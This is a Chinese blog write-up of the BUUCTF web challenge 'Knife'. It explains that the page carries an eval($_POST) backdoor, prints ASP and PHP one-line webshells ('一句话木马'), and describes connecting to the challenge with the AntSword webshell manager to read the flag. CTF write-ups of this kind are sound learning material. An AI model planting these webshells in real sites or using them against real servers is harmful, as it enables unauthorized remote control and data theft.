美文网首页
CTF-Web-[极客大挑战 2019]Knife

CTF-Web-[极客大挑战 2019]Knife

作者: 归子莫 | 来源:发表于2020-05-03 09:35 被阅读0次

CTF-Web-[极客大挑战 2019]Knife

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Web类,[极客大挑战 2019]Knife

image-20200502184817778

打开题目的实例

image-20200502184928088

思路

看到这种题目,首先到处点一点,看看有什么奇怪的地方,然后打开源代码,差不多就是这样,然后一顿操作没有怎么发现,反而eval($_POST["Syc"])这一段比较明显,是作为后门用post提交一个字符串Syc,刚好结合名字Knife,想起了一个东西--中国菜刀

中国菜刀

下载地址

http://xiazai.zol.com.cn/detail/44/438518.shtml

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理

一般针对于一句话木马

一句话木马

短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常用一句话木马如下:

asp一句话木马:

   <%execute(request("value"))%>

php一句话木马:

   <?php @eval($_POST[value]);?>

当然我的是mac,安装不了菜刀,但是可以安装另一个神器--中国蚁剑

中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。

核心功能
  • Shell代理功能
  • Shell管理
  • 文件管理
  • 虚拟终端
  • 数据库管理
  • 插件市场
  • 插件开发
下载地址

https://github.com/AntSwordProject/AntSword-Loader

image-20200502223323056

下载了几个世纪,我先睡一觉,希望明天不要就消失了

我来了,果然没让我失望,无效了,不过重新下载挺快的

地址

http://4343b396-4e3f-4765-b250-f4ec6443dc02.node3.buuoj.cn/Knife.php

密码

Syc

蚁剑连接

输入地址和密码

image-20200503092406013

在根目录下找到flag

image-20200503092937939 image-20200503093137941

感谢

BUUCTF

以及勤劳的自己

相关文章

网友评论

      本文标题:CTF-Web-[极客大挑战 2019]Knife

      本文链接:https://www.haomeiwen.com/subject/mlzrghtx.html